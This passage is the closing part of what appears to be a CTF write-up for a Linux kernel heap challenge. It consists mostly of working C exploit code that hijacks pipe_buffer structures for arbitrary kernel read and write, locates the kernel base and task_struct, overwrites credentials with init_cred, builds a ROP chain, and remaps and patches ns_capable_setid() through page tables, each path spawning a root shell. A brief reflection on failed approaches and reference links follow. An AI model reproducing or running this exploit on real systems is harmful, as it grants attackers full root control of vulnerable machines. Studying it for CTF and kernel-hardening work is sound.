puts("[*] hijacking the 3rd pipe_buffer on page to itself...");
evil_pipe_buf.offset = TRD_PIPE_BUF_SZ;
evil_pipe_buf.len = TRD_PIPE_BUF_SZ;

write(pipe_fd[snd_vicitm_pid][1], buf, TRD_PIPE_BUF_SZ - sizeof(evil_pipe_buf));
write(pipe_fd[snd_vicitm_pid][1], &evil_pipe_buf, sizeof(evil_pipe_buf));

for (int i = 0; i < PIPE_SPRAY_NUM; i++)
{
if (i == orig_pid || i == victim_pid || i == snd_orig_pid || i == snd_vicitm_pid || i == self_2nd_pipe_pid)
{
continue;
}

read(pipe_fd[i][0], &page_ptr, sizeof(page_ptr));
if (page_ptr == evil_pipe_buf.page)
{
self_3rd_pipe_pid = i;
printf("\033[32m\033[1m[+] Found another self-writing pipe:\033[0m"
"%d\n",
self_3rd_pipe_pid);
break;
}
}

if (self_3rd_pipe_pid == -1)
{
errExit("FAILED to build a self-writing pipe!");
}

puts("[*] hijacking the 4th pipe_buffer on page to itself...");
evil_pipe_buf.offset = TRD_PIPE_BUF_SZ;
evil_pipe_buf.len = TRD_PIPE_BUF_SZ;

write(pipe_fd[snd_vicitm_pid][1], buf, TRD_PIPE_BUF_SZ - sizeof(evil_pipe_buf));
write(pipe_fd[snd_vicitm_pid][1], &evil_pipe_buf, sizeof(evil_pipe_buf));

for (int i = 0; i < PIPE_SPRAY_NUM; i++)
{
if (i == orig_pid || i == victim_pid || i == snd_orig_pid || i == snd_vicitm_pid || i == self_2nd_pipe_pid || i == self_3rd_pipe_pid)
{
continue;
}

read(pipe_fd[i][0], &page_ptr, sizeof(page_ptr));
if (page_ptr == evil_pipe_buf.page)
{
self_4th_pipe_pid = i;
printf("\033[32m\033[1m[+] Found another self-writing pipe:\033[0m"
"%d\n",
self_4th_pipe_pid);
break;
}
}

if (self_4th_pipe_pid == -1)
{
errExit("FAILED to build a self-writing pipe!");
}
}

{
puts("[*] Setting up kernel arbitrary read & write...");

memcpy(&evil_2nd_buf, &info_pipe_buf, sizeof(evil_2nd_buf));
memcpy(&evil_3rd_buf, &info_pipe_buf, sizeof(evil_3rd_buf));
memcpy(&evil_4th_buf, &info_pipe_buf, sizeof(evil_4th_buf));

evil_2nd_buf.offset = 0;
evil_2nd_buf.len = 0xff0;

evil_3rd_buf.offset = TRD_PIPE_BUF_SZ * 3;
evil_3rd_buf.len = 0;
write(pipe_fd[self_4th_pipe_pid][1], &evil_3rd_buf, sizeof(evil_3rd_buf));

evil_4th_buf.offset = TRD_PIPE_BUF_SZ;
evil_4th_buf.len = 0;
}

{
vmemmap_base = (size_t)info_pipe_buf.page & 0xfffffffff0000000;
for (;;)
{
arbitrary_read_by_pipe((struct page *)(vmemmap_base + 157 * 0x40), buf);

if (*(uint64_t *)buf > 0xffffffff81000000 && ((*(uint64_t *)buf & 0xfff) == 0x070))
{
kernel_base = *(uint64_t *)buf - 0x070;
kernel_offset = kernel_base - 0xffffffff81000000;
printf("\033[32m\033[1m[+] Found kernel base: \033[0m0x%lx\n"
"\033[32m\033[1m[+] Kernel offset: \033[0m0x%lx\n",
kernel_base, kernel_offset);
break;
}

vmemmap_base -= 0x10000000;
}
printf("\033[32m\033[1m[+] vmemmap_base:\033[0m 0x%lx\n\n", vmemmap_base);
}

uint64_t parent_task, current_task;

{
puts("[*] Seeking task_struct in memory...");

uint64_t *comm_addr = 0;
uint64_t *point_buf = malloc(0x1000);

for (int i = 0; 1; i++)
{
arbitrary_read_by_pipe((struct page *)(vmemmap_base + i * 0x40), point_buf);

comm_addr = memmem(point_buf, 0xf00, target, 0xf);
if (comm_addr && (comm_addr[-2] > 0xffff888000000000) && (comm_addr[-3] > 0xffff888000000000) && (comm_addr[-57] > 0xffff888000000000) && (comm_addr[-56] > 0xffff888000000000))
{
parent_task = comm_addr[-57];

current_task = comm_addr[-50] - 2528;

page_offset_base = (comm_addr[-50] & 0xfffffffffffff000) - i * 0x1000;
page_offset_base &= 0xfffffffff0000000;

printf("\033[32m\033[1m[+] Found task_struct on page: \033[0m%p\n",
(struct page *)(vmemmap_base + i * 0x40));
printf("\033[32m\033[1m[+] page_offset_base: \033[0m0x%lx\n",
page_offset_base);
printf("\033[34m\033[1m[*] current task_struct's addr: \033[0m"
"0x%lx\n\n",
current_task);
break;
}
}
}

int command = 0;
uint64_t stack_addr;
size_t *tsk_buf;
size_t *mm_struct_buf;
uint64_t mm_struct_addr;
uint64_t mm_struct_page;
uint64_t pgd_addr;

switch (command)
{
case 0:
puts("[*] Seeking for init_task...");
{
uint64_t init_task;
uint64_t init_cred;
uint64_t init_nsproxy;

for (;;)
{
size_t ptask_page_addr = direct_map_addr_to_page_addr(parent_task);

tsk_buf = (size_t *)((size_t)buf + (parent_task & 0xfff));

arbitrary_read_by_pipe((struct page *)ptask_page_addr, buf);
arbitrary_read_by_pipe((struct page *)(ptask_page_addr + 0x40), &buf[512 * 8]);

/* task_struct::real_parent */
if (parent_task == tsk_buf[309])
{
break;
}

parent_task = tsk_buf[309];
}

init_task = parent_task;
init_cred = tsk_buf[363];
init_nsproxy = tsk_buf[377];

printf("\033[32m\033[1m[+] Found init_task: \033[0m0x%lx\n", init_task);
printf("\033[32m\033[1m[+] Found init_cred: \033[0m0x%lx\n", init_cred);
printf("\033[32m\033[1m[+] Found init_nsproxy:\033[0m0x%lx\n", init_nsproxy);

/* now, changing the current task_struct to get the full root :) */
puts("[*] Escalating ROOT privilege now...");

size_t current_task_page = direct_map_addr_to_page_addr(current_task);

arbitrary_read_by_pipe((struct page *)current_task_page, buf);
arbitrary_read_by_pipe((struct page *)(current_task_page + 0x40), &buf[512 * 8]);

tsk_buf = (size_t *)((size_t)buf + (current_task & 0xfff));
tsk_buf[363] = init_cred;
tsk_buf[364] = init_cred;
tsk_buf[377] = init_nsproxy;

arbitrary_write_by_pipe((struct page *)current_task_page, buf, 0xff0);
arbitrary_write_by_pipe((struct page *)(current_task_page + 0x40),
&buf[512 * 8], 0xff0);

puts("[+] Done.\n");
puts("[*] checking for root...");

get_shell();
}
break;
case 1:
puts("[*] Reading current task_struct...");
{
size_t current_task_page = direct_map_addr_to_page_addr(current_task);
arbitrary_read_by_pipe((struct page *)current_task_page, buf);
arbitrary_read_by_pipe((struct page *)(current_task_page + 0x40), &buf[512 * 8]);

tsk_buf = (size_t *)((size_t)buf + (current_task & 0xfff));
stack_addr = tsk_buf[4];
mm_struct_addr = tsk_buf[292];

printf("\033[34m\033[1m[*] kernel stack's addr:\033[0m0x%lx\n", stack_addr);
printf("\033[34m\033[1m[*] mm_struct's addr:\033[0m0x%lx\n", mm_struct_addr);

mm_struct_page = direct_map_addr_to_page_addr(mm_struct_addr);

printf("\033[34m\033[1m[*] mm_struct's page:\033[0m0x%lx\n", mm_struct_page);

arbitrary_read_by_pipe((struct page *)mm_struct_page, buf);
arbitrary_read_by_pipe((struct page *)(mm_struct_page + 0x40), &buf[512 * 8]);

mm_struct_buf = (size_t *)((size_t)buf + (mm_struct_addr & 0xfff));

pgd_addr = mm_struct_buf[9];

printf("\033[32m\033[1m[+] Got kernel page table of current task:\033[0m"
"0x%lx\n\n",
pgd_addr);
}
{
puts("[*] Reading page table...");

size_t rop[0x1000];
size_t idx = 0;
uint64_t stack_addr_another;
size_t pud_addr, pmd_addr, pte_addr, pte_val;
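
/*
 * The kernel stack lives in vmalloc space, which the direct-map
 * read/write primitive cannot reach. Walk the task's page table
 * (PGD -> PUD -> PMD -> PTE) to translate the stack address to its
 * physical page, then rebase that into the direct map to obtain a
 * second, reachable virtual alias of the same stack.
 */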

arbitrary_read_by_pipe((void *)direct_map_addr_to_page_addr(pgd_addr), buf);
pud_addr = (*(size_t *)((size_t *)buf + PGD_ENTRY(stack_addr)) & (~0xfff)) & (~PAGE_ATTR_NX);
pud_addr += page_offset_base;

arbitrary_read_by_pipe((void *)direct_map_addr_to_page_addr(pud_addr), buf);
pmd_addr = (*(size_t *)((size_t *)buf + PUD_ENTRY(stack_addr)) & (~0xfff)) & (~PAGE_ATTR_NX);
pmd_addr += page_offset_base;

arbitrary_read_by_pipe((void *)direct_map_addr_to_page_addr(pmd_addr), buf);
pte_addr = (*(size_t *)((size_t *)buf + PMD_ENTRY(stack_addr)) & (~0xfff)) & (~PAGE_ATTR_NX);
pte_addr += page_offset_base;

arbitrary_read_by_pipe((void *)direct_map_addr_to_page_addr(pte_addr), buf);
pte_val = (*(size_t *)((size_t *)buf + PTE_ENTRY(stack_addr)) & (~0xfff)) & (~PAGE_ATTR_NX);

stack_addr_another = pte_val;
stack_addr_another &= (~PAGE_ATTR_NX);
stack_addr_another += page_offset_base;

printf("\033[32m\033[1m[+] Got another virt addr of kernel stack: \033[0m"
"0x%lx\n\n",
stack_addr_another);
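
/*
 * Build the ROP chain: pad most of the page with a ret sled so that
 * wherever the return path lands it slides into
 * commit_creds(&init_cred), then exit to user space through the
 * swapgs_restore_regs_and_return_to_usermode trampoline (entered 54
 * bytes in, past its initial register pops); the two "0x196082" qwords
 * are dummy values the trampoline consumes before iretq.
 */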

for (int i = 0; i < ((0x1000 - 0x100) / 8); i++)
{
rop[idx++] = RET + kernel_offset;
}

rop[idx++] = POP_RDI_RET + kernel_offset;
rop[idx++] = INIT_CRED + kernel_offset;
rop[idx++] = COMMIT_CREDS + kernel_offset;
rop[idx++] = SWAPGS_RESTORE_REGS_AND_RETURN_TO_USERMODE + 54 + kernel_offset;
rop[idx++] = *(size_t *)"0x196082";
rop[idx++] = *(size_t *)"0x196082";
rop[idx++] = (size_t)get_shell;
rop[idx++] = user_cs;
rop[idx++] = user_rflags;
rop[idx++] = user_sp;
rop[idx++] = user_ss;

uint64_t stack_page = direct_map_addr_to_page_addr(stack_addr_another);

puts("[*] Hijacking current task's stack...");

sleep(5);
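
/*
 * This write lands on the very stack our own syscall is running on:
 * when the write returns, the kernel unwinds into the ret sled and the
 * ROP chain fires, so execution never comes back here normally.
 */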

arbitrary_write_by_pipe((struct page *)(stack_page + 0x40 * 3), rop, 0xff0);
}
break;
case 2:
puts("[*] Reading current task_struct...");
{
size_t current_task_page = direct_map_addr_to_page_addr(current_task);
arbitrary_read_by_pipe((struct page *)current_task_page, buf);
arbitrary_read_by_pipe((struct page *)(current_task_page + 0x40), &buf[512 * 8]);

tsk_buf = (size_t *)((size_t)buf + (current_task & 0xfff));
stack_addr = tsk_buf[4];
mm_struct_addr = tsk_buf[292];

printf("\033[34m\033[1m[*] kernel stack's addr:\033[0m0x%lx\n", stack_addr);
printf("\033[34m\033[1m[*] mm_struct's addr:\033[0m0x%lx\n", mm_struct_addr);

mm_struct_page = direct_map_addr_to_page_addr(mm_struct_addr);

printf("\033[34m\033[1m[*] mm_struct's page:\033[0m0x%lx\n", mm_struct_page);

arbitrary_read_by_pipe((struct page *)mm_struct_page, buf);
arbitrary_read_by_pipe((struct page *)(mm_struct_page + 0x40), &buf[512 * 8]);

mm_struct_buf = (size_t *)((size_t)buf + (mm_struct_addr & 0xfff));

pgd_addr = mm_struct_buf[9];

printf("\033[32m\033[1m[+] Got kernel page table of current task:\033[0m"
"0x%lx\n\n",
pgd_addr);
}
{
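/*
 * Plan B (USMA-style page-table attack): instead of ROP, remap the
 * physical page containing ns_capable_setid() into our own address
 * space by rewriting the PTEs of a user mapping, then patch the
 * function's code directly from user space.
 */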
char *kcode_map;
size_t dst_paddr, dst_vaddr;

kcode_map = mmap((void *)0x114514000, 0x2000, PROT_READ | PROT_WRITE,
MAP_ANONYMOUS | MAP_PRIVATE | MAP_FIXED, -1, 0); /* MAP_FIXED: the page-table walk below assumes this exact address */
if (kcode_map == MAP_FAILED) /* mmap() returns MAP_FAILED, not NULL, on error */
{
errExit("FAILED to create mmap area!");
}
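
/*
 * Touch both pages so they are faulted in and their PTEs actually exist
 * before we go looking for them in the page table; the bytes written
 * are throwaway.
 */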

for (int i = 0; i < 8; i++)
{
kcode_map[i] = "0x196082"[i];
kcode_map[i + 0x1000] = "0x196082"[i];
}

dst_vaddr = NS_CAPABLE_SETID + kernel_offset;
printf("\033[34m\033[1m[*] vaddr of ns_capable_setid is: \033[0m0x%lx\n", dst_vaddr);

size_t pud_addr, pmd_addr;

arbitrary_read_by_pipe((void *)direct_map_addr_to_page_addr(pgd_addr), buf);
pud_addr = (*(size_t *)((size_t *)buf + PGD_ENTRY(dst_vaddr)) & (~0xfff)) & (~PAGE_ATTR_NX);
pud_addr += page_offset_base;

arbitrary_read_by_pipe((void *)direct_map_addr_to_page_addr(pud_addr), buf);
pmd_addr = (*(size_t *)((size_t *)buf + PUD_ENTRY(dst_vaddr)) & (~0xfff)) & (~PAGE_ATTR_NX);
pmd_addr += page_offset_base;

arbitrary_read_by_pipe((void *)direct_map_addr_to_page_addr(pmd_addr), buf);
dst_paddr = (*(size_t *)((size_t *)buf + PMD_ENTRY(dst_vaddr)) & (~0xfff)) & (~PAGE_ATTR_NX);

dst_paddr += 0x1000 * PTE_ENTRY(dst_vaddr);

printf("\033[32m\033[1m[+] Got ns_capable_setid's phys addr: \033[0m"
"0x%lx\n\n",
dst_paddr);

size_t pte_addr;
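
/*
 * Walk our own page table for the two user pages at 0x114514000 and
 * point each PTE at ns_capable_setid()'s physical page(s).
 * 0x8000000000000867 is a typical user R/W PTE flag set
 * (present | RW | user | accessed | dirty) with the NX bit (bit 63)
 * kept, since we only ever write through this alias.
 */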
{
arbitrary_read_by_pipe((void *)direct_map_addr_to_page_addr(pgd_addr), buf);
pud_addr = (*(size_t *)((size_t *)buf + PGD_ENTRY(0x114514000)) & (~0xfff)) & (~PAGE_ATTR_NX);
pud_addr += page_offset_base;

arbitrary_read_by_pipe((void *)direct_map_addr_to_page_addr(pud_addr), buf);
pmd_addr = (*(size_t *)((size_t *)buf + PUD_ENTRY(0x114514000)) & (~0xfff)) & (~PAGE_ATTR_NX);
pmd_addr += page_offset_base;

arbitrary_read_by_pipe((void *)direct_map_addr_to_page_addr(pmd_addr), buf);
pte_addr = (*(size_t *)((size_t *)buf + PMD_ENTRY(0x114514000)) & (~0xfff)) & (~PAGE_ATTR_NX);
pte_addr += page_offset_base;

arbitrary_read_by_pipe((void *)direct_map_addr_to_page_addr(pte_addr), buf);
*(size_t *)((size_t *)buf + PTE_ENTRY(0x114514000)) = dst_paddr | 0x8000000000000867;
arbitrary_write_by_pipe((void *)direct_map_addr_to_page_addr(pte_addr), buf, 0xff0);
}

{
arbitrary_read_by_pipe((void *)direct_map_addr_to_page_addr(pgd_addr), buf);
pud_addr = (*(size_t *)((size_t *)buf + PGD_ENTRY(0x114514000 + 0x1000)) & (~0xfff)) & (~PAGE_ATTR_NX);
pud_addr += page_offset_base;

arbitrary_read_by_pipe((void *)direct_map_addr_to_page_addr(pud_addr), buf);
pmd_addr = (*(size_t *)((size_t *)buf + PUD_ENTRY(0x114514000 + 0x1000)) & (~0xfff)) & (~PAGE_ATTR_NX);
pmd_addr += page_offset_base;

arbitrary_read_by_pipe((void *)direct_map_addr_to_page_addr(pmd_addr), buf);
pte_addr = (*(size_t *)((size_t *)buf + PMD_ENTRY(0x114514000 + 0x1000)) & (~0xfff)) & (~PAGE_ATTR_NX);
pte_addr += page_offset_base;

arbitrary_read_by_pipe((void *)direct_map_addr_to_page_addr(pte_addr), buf);
*(size_t *)((size_t *)buf + PTE_ENTRY(0x114514000 + 0x1000)) = (dst_paddr + 0x1000) | 0x8000000000000867;
arbitrary_write_by_pipe((void *)direct_map_addr_to_page_addr(pte_addr), buf, 0xff0);
}

puts("[*] Start overwriting kernel code segment...");

/**
* The setresuid() check for user's permission by ns_capable_setid(),
* so we can just patch it to let it always return true :)
*/
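/*
 * Byte decoding of the patch: 0x40 bytes of 0x90 (nop) at the function
 * entry slide into "\xf3\x0f\x1e\xfa" (endbr64),
 * "\x48\xc7\xc0\x01\x00\x00\x00" (mov rax, 1) and "\xc3" (ret), so
 * ns_capable_setid() unconditionally returns true.
 */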
memset(kcode_map + (NS_CAPABLE_SETID & 0xfff), '\x90', 0x40);
memcpy(kcode_map + (NS_CAPABLE_SETID & 0xfff) + 0x40,
"\xf3\x0f\x1e\xfa"
"H\xc7\xc0\x01\x00\x00\x00"
"\xc3",
12);

puts("[*] trigger evil ns_capable_setid() in setresuid()...\n");

sleep(5);

setresuid(0, 0, 0);
get_shell();
}
}

return 0;
}

image-20230524153518128
image-20230524160032198
image-20230524162232568

The clumsy approach I took at the time

Since I had noticed the off-by-null vulnerability, my first instinct was to attack it with the msg_msg structure. That was pure dumb luck: without doing any page-level heap feng shui, the msg_msg I allocated happened to land in an order-3 slab, which gave some probability of turning the bug into a UAF. Naturally, my first instinct was also to overwrite a cred structure. I could locate one successfully, but the success rate was abysmal: each debugging run took over twenty minutes by hand, because a large region of memory is filled with assorted pointers, so the search could not continue downward without triggering a kernel panic. On top of that, after dropping back to normal user privileges I ran into the io_uring limitation described at the beginning of this article, so I abandoned this approach.

Then, not yet understanding what CFI does, I went off to overwrite ops tables instead, and after half a day of debugging found that it would always panic at the final step; I also never found a gadget usable for a stack pivot, so that approach was abandoned as well. Right after the competition ended, reading NULL's write-up made me realize how dense I had been: I could already overwrite pipe_buffer directly, yet Dirty Pipe never crossed my mind. Although 墨晚鸢 says it is not the optimal solution, it was the one method I could actually have pulled off, and I still missed it. I really am an idiot!!!


References:

https://arttnba3.cn/2023/05/02/CTF-0X08_D3CTF2023_D3KCACHE/#Final-Exploitation

https://elixir.bootlin.com/linux/v6.2.12/source
